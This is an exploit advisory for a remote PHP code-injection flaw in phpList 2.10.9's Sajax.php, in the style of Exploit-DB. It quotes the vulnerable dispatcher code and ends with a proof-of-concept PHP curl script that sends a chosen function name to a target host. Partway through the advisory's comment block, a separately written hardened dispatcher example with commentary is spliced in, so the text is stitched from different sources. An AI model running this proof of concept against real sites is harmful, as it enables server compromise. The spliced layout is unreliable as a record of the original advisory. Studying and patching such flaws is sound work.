phpList 2.10.9 – ‘Sajax.php’ PHP Code Injection

  • Author: L3b-r1'z
    Date: 2012-05-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37318/
  • Source: https://www.securityfocus.com/bid/53693/info
    
    PHPList is prone to a remote PHP code-injection vulnerability.
    
    An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
    
    PHPList 2.10.9 is vulnerable; other versions may also be affected.
    
    # --------------------------------------- #
    # This PoC was written for educational purposes. Use it at your own risk.
    # The author will not be responsible for any damage.
    # --------------------------------------- #
    # 1) Bug
    # 2) PoC
    # --------------------------------------- #
    # 1) Bug :
    # An attacker can execute arbitrary PHP code through this vulnerability.
    # User-tainted data is embedded into a function that compiles and executes
    # PHP code at run time, allowing an attacker to inject their own PHP code,
    # which is then executed. This vulnerability can lead to full server compromise.
    # Look at the file Sajax.php in the directory admin/commonlib/lib, line 63:
    # 63.     $func_name = $_POST["rs"];
    #         if (! empty($_POST["rsargs"]))
    #             $args = $_POST["rsargs"];
    #         else
    #             $args = array();
    #     }
    #
    #     if (! in_array($func_name, $sajax_export_list))
    #         echo "-:$func_name not callable";
    #     else {
    #         echo "+:";
    # 74.     $result = call_user_func_array($func_name, $args);
    #         echo $result;
    #     }
    #     exit;
    # }
    # So the function name comes straight from the POST parameter rs.
    # Above this block the same value is taken from $_GET['rs'], which is exactly what an attacker wants.
    # Look at line 74:
    # call_user_func_array($func_name, $args);
    # An attacker can inject PHP code through the GET or POST parameter.
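The dispatcher quoted above takes the function name and its arguments from the request and hands them to call_user_func_array, guarded only by a loose in_array membership test. The following is an added example, written for this page and not part of the advisory or of phpList/Sajax, of how the same "+:" / "-:" RPC handler can be written so that the client never names a callable directly. The names safe_dispatch and $export_map, and the two sample exported functions, are hypothetical.

```php
<?php
// Added example, not from the advisory or from phpList/Sajax.
// Hardened variant of the Sajax-style request handler quoted above.
declare(strict_types=1);

// Fixed map from the keys a client may send to the callables they run.
// This map is defined in code only and must never be built from request data.
$export_map = [
    'get_user_count' => fn(): string => '42',                  // constructed sample
    'echo_upper'     => fn(string $s): string => strtoupper($s), // constructed sample
];

/**
 * Dispatch one request. Returns "+:<result>" on success or "-:<reason>" on
 * rejection, mirroring the Sajax wire convention.
 *
 * Differences from the quoted dispatcher:
 *  - the request supplies a key, not a callable; the key is resolved with
 *    array_key_exists (exact string match, no loose in_array comparison);
 *  - the key must be a string and the argument list must be an array of scalars;
 *  - argument-count and type errors are caught instead of leaking a fatal error.
 */
function safe_dispatch(array $export_map, array $request): string
{
    $func_name = $request['rs'] ?? null;
    if (!is_string($func_name) || !array_key_exists($func_name, $export_map)) {
        return '-:not callable';
    }

    $args = $request['rsargs'] ?? [];
    if (!is_array($args)) {
        return '-:bad arguments';
    }
    foreach ($args as $a) {
        if (!is_scalar($a)) {
            return '-:bad arguments';
        }
    }

    try {
        $result = ($export_map[$func_name])(...array_values($args));
    } catch (\TypeError $e) {            // covers ArgumentCountError as well
        return '-:bad arguments';
    }
    return '+:' . $result;
}

// Constructed requests: one legitimate call, one naming a function that is
// not in the export map (the shape of a probe against the original handler).
echo safe_dispatch($export_map, ['rs' => 'echo_upper', 'rsargs' => ['hello']]), "\n"; // +:HELLO
echo safe_dispatch($export_map, ['rs' => 'system',     'rsargs' => ['id']]),    "\n"; // -:not callable
echo safe_dispatch($export_map, ['rs' => ['x'],        'rsargs' => []]),        "\n"; // -:not callable
```

The important property is that the value under the client's control is only ever used as a lookup key into a map the application defines; call_user_func_array is never given a client-supplied string. Rejecting non-string keys and non-scalar arguments also closes the path where a request carrying arrays where strings are expected produces PHP warnings or type errors that reveal internals.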
    # --------------------------------------- #
    # 2) PoC :
    # <?php
    # // The target host is taken from the first command-line argument.
    # $target = $argv[1];
    # $ch = curl_init();
    # curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    # curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");
    # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    # curl_setopt($ch, CURLOPT_POST, 1);
    # // The function name is sent in the rs POST parameter read by Sajax.php.
    # curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");
    # curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    # curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
    # curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
    # curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
    # $buf = curl_exec($ch);
    # curl_close($ch);
    # unset($ch);
    # echo $buf;
    # ?>